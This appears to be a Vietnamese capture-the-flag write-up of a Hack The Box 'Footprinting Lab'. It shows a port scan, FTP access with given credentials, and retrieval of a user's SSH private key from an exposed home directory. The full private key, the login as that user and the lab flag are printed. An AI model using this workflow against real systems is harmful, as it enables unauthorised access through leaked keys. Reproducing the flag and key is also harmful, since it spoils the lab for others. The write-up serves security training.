Footprinting Lab
November 4, 2025
•
September 23, 2025
•
Easy
Author
Hung Nguyen Tuong
Hung Nguyen TuongInitial Reconnaissance
Credentials đã cho từ mô tả của lab:
ceil:qwer1234Service Scanning
┌──(kali㉿hungnt-desktop)-[~]
└─$ rustscan -a 10.129.154.205 -- -sV -sC
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (ftp.int.inlanefreight.htb) [10.129.154.205]
| Invalid command: try being more creative
|_ Invalid command: try being more creative
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 3f:4c:8f:10:f1:ae:be:cd:31:24:7c:a1:4e:ab:84:6d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDa9RJRoAShv6FzLx23WYUh5z5vpaC1W0jTGGJuVfOVmOiwXu7d+eLRcf51dFwqe2J4OZ7z70w6Lrbm3RyKjNSZmY0ekPqbXyP0P6KqYn4eFdJkYp74zPUEvC/Y5U9gYmvCpoQ8gvqgAImYwhBXAlAmGDptcfRWRJ3KaRG/bbmfg0vsWqwYvDVfxEcCfbO1m7v6a9EiWELRTynHS26+oJbjY7tX5X05XMvj6L53JMWodHVsFf/vD4/qP2Ic0lafSBXuyKOcN5Tnx0DpExUwqj7GPLaM/ljG5LjF8y2yqZ85GeNQsgnsSxIL6dHiWkbUP4RXogUVI/prXLDU8307Wn/LWJQl3hxjJmunJfC5qw4a/JPLd9ydFSwadjYhztQoYIsSp41mr/wEVns8owxcKzBju74T9FptZ4I4UAzZLIWg1RJzpnJ7wpnFSUXFbvOa6V+nzeMesjYvKK1vx+UuNtrUuXPJm3BoYKjRJd2msog1KX4CguQNGZMS6LegiRIGde0=
| 256 7b:30:37:67:50:b9:ad:91:c0:8f:f7:02:78:3b:7c:02 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNAdY+PFLa0XBlXCp3lL+mrrQKkU6bxWjDVEsljltzBYtugbDuER3AyIq1igFdgQPn+uKh5RtNQvPvX1Al8pA0Y=
| 256 88:9e:0e:07:fe:ca:d0:5c:60:ab:cf:10:99:cd:6c:a7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGKKM5saOYH/Fq3lWY1P4fchdWaH60Ib5/VQk6A00nAP
53/tcp open domain syn-ack ttl 63 ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
2121/tcp open ftp syn-ack ttl 63
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (Ceil's FTP) [10.129.154.205]
| Invalid command: try being more creative
|_ Invalid command: try being more creativeChúng ta phát hiện ra 1 port chạy SSH, 1 port chạy DNS, và 2 port chạy FTP server.
FTP 21
FTP server port 21 không chứa file gì.
SSH 22
SSH không cho phép password authentication:
FTP 2121
FTP server tại port 2121 có vẻ như đang chia sẻ thư mục home của user nào đó. Đặc biệt là thư mục .ssh có mặt ở đây.
Chúng ta tìm thấy private SSH key của user nào đó tại đây:
ftp> ls -la
229 Entering Extended Passive Mode (|||33746|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 294 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Nov 10 2021 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Nov 10 2021 .bashrc
drwx------ 2 ceil ceil 4096 Nov 10 2021 .cache
-rw-r--r-- 1 ceil ceil 807 Nov 10 2021 .profile
drwx------ 2 ceil ceil 4096 Nov 10 2021 .ssh
-rw------- 1 ceil ceil 759 Nov 10 2021 .viminfo
226 Transfer complete
ftp> cd .ssh
250 CWD command successful
ftp> ls
229 Entering Extended Passive Mode (|||4482|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 ceil ceil 738 Nov 10 2021 authorized_keys
-rw------- 1 ceil ceil 3381 Nov 10 2021 id_rsa
-rw-r--r-- 1 ceil ceil 738 Nov 10 2021 id_rsa.pub
226 Transfer complete
ftp> get id_rsa
local: id_rsa remote: id_rsa
229 Entering Extended Passive Mode (|||58540|)
150 Opening BINARY mode data connection for id_rsa (3381 bytes)
100% |***********************************************************************************************************************************************| 3381 17.15 MiB/s 00:00 ETA
226 Transfer complete
3381 bytes received in 00:00 (12.17 KiB/s)ftp> !cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----Private key này thuộc về user ceil:
ftp> more id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCjsW8daBhok6a+sVGXMA54aZ2H2Cx7cZIgOh54k9j/fjdcIR0sUWf0eMKiVsqpn2ePLimoIu/yMiIlBY89ZDYNrKqfUXQ+OEF5uWMyHviQK3Plcmb4sGrjxGemfotCYOcK63Gac/AvRS0TxV44PTac
tBJjfAqemIW8I4EKL9fGXHk0VPx5ou4p7N0x7vrdekfiVH9mqQl9B9MWNknEubgRDiLONZ8sA8JZntcZDFJ5IuW6lc22NZSWPvQ7P3v3AY5zWtB+cxpPwMcmnAsMwEbtKX7PFsvyf6Bx130VoBfbpxH9OzdU9/i8VZVtzu7sixVAzfIKxYd4hc7MP9gz
nQvaqOXEn8MIVrW0FzwohZ5JGhEaHe5QhRQX8+Z2nNE2CQGSoM8aLfHxg3pwwG6aYvqMsXkqWKwOO+U6vj73sDjsWJ5PEpSd01B/y1lzbA1V8SRuZ+r7BnpgR1UL0TdtR9rlVi6kEIoVzIuqlheKYt5ABGTmaYdqUZwGDFp97SqWOSBTiCC0D2bmBJaq
gfJWJH1BxfHin/BlydHzTHpQhQ9Q8uHsVFIAWZA+yaNGTichA4bS6WaEktfNYIyUaRU+PsPql8iUI72iDVBmc2ImAzGRvhDpC3URW8iC6ndcIWJ+FHufyT6daYmNnClj4S5JsP+BeN+VsWjgXgeXxGwJp9EL4Q== ceil@NIXEASYShell as ceil
Ta SSH vào target với private key của user ceil:
flag.txt
ceil@NIXEASY:~$ cd ..
ceil@NIXEASY:/home$ cd flag
ceil@NIXEASY:/home/flag$ ls -la
total 36
drwxr-xr-x 4 ceil ceil 4096 Nov 10 2021 .
drwxr-xr-x 5 root root 4096 Nov 10 2021 ..
-rw------- 1 ceil ceil 42 Nov 10 2021 .bash_history
-rw-r--r-- 1 ceil ceil 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 ceil ceil 3771 Feb 25 2020 .bashrc
drwx------ 2 ceil ceil 4096 Dec 15 2020 .cache
-rw-rw-r-- 1 ceil ceil 61 Nov 10 2021 flag.txt
drwxrwxr-x 3 ceil ceil 4096 Dec 15 2020 .local
-rw-r--r-- 1 ceil ceil 807 Feb 25 2020 .profile
-rw-r--r-- 1 ceil ceil 0 Dec 15 2020 .sudo_as_admin_successful
ceil@NIXEASY:/home/flag$ cat flag.txt
HTB{7nrzise7hednrxihskjed7nzrgkweunj47zngrhdbkjhgdfbjkc7hgj}